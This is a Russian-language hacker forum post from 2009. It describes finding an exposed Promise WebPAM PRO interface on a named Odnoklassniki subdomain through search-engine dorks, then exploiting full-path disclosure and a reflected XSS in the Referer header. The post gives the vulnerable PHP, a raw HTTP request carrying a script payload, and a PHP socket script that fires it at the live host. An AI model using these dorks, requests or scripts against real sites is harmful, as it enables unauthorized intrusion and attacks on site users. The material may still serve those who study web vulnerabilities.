Решил я как то погуглить по одноклашкам google.com sitednoklassniki.ru -www -rabota -std -mg2 -mg1 -..... в результате большенство основных линков отсеилось и моему взору предстала интересная ссылка http://c4.odnoklassniki.ru/ там доступ к ститеме webpam pro (вот сайт производителя http://www.promise.com/support/download/download2_eng.asp?category=all&os=100&productID=121) перейдя по ссылке http://c4.odnoklassniki.ru/contact.php увидел раскрытие абсолютных путей ))) немного поэкспирементировав с параметрами в посылаемом http запросе я получил следующее session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /islavista/sw/php/promise/language.php on line 15 Notice: Undefined offset: 1 in /islavista/sw/php/promise/language.php on line 24 Notice: Undefined index: HTTP_REFERER in /oem/sw/gui/languages/en_US_Contact.html on line 189 Notice: Undefined index: HTTP_REFERER in /oem/sw/gui/languages/en_US_Contact.html on line 191 опа, па ! ага, значит посмотрим http://c4.odnoklassniki.ru/languages/en_US_Contact.html http://c4.odnoklassniki.ru/languages/en_US_Contact.html видим кусок php кода который в этом html <? if(preg_match('/index.php/',$_SERVER['HTTP_REFERER'])) echo '<tr><td><a href="'.$_SERVER['HTTP_REFERER'].'">Back</a></td><td></td></tr>'; if(preg_match('/help/',$_SERVER['HTTP_REFERER'])) // echo '<tr><td><a href="'.$_SERVER['HTTP_REFERER'].'">Back</a></td><td></td></tr>'; echo '<table><tr><td><img src=help/helpImages/ball-back.gif></td><td><a href=javascript:history.back()>Go Back</a></td></tr></table>'; ?> интересно, значит можно послать http запрос с xss в реферере GET /contact.php HTTP/1.1 Host: c4.odnoklassniki.ru User-Agent: * Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: /index.php/"><script>alert(0);</script> вот как вариант запрос вот реализация на php <?php $res = ''; $sock=fsockopen('c4.odnoklassniki.ru',80, $errno, $errstr, 30); if(!$sock) { echo $errstr($errno); }else{ $headers = "GET /contact.php HTTP/1.1\r\n"; $headers .="Host: c4.odnoklassniki.ru\r\n"; $headers .="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)\r\n"; $headers .="Accept-Language: en\r\n"; $headers .="Referer: /index.php/\"><script>alert(123)</script>\r\n"; $headers .="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $headers .="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n"; $headers .="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $headers .="Cache-Control: no-cache\r\n\r\n"; } fwrite($sock, $headers); while(!feof($sock)){ $res .=fgets($sock, 1024); } echo $res; ?> Вот такие бывают вещи. актуальность 21.04.2009
+ http://c4.odnoklassniki.ru/js/plib.js Code: /******************************************************************************* * Filename : plib.js * Description : Javascript functions * Created on : 07/18/03 * CVS Version : $Id: plib.js,v 1.36 2007/03/14 07:38:55 xinc Exp $ * * (C) Copyright Promise Technology Inc., 2003 * All Rights Reserved ******************************************************************************/ ...
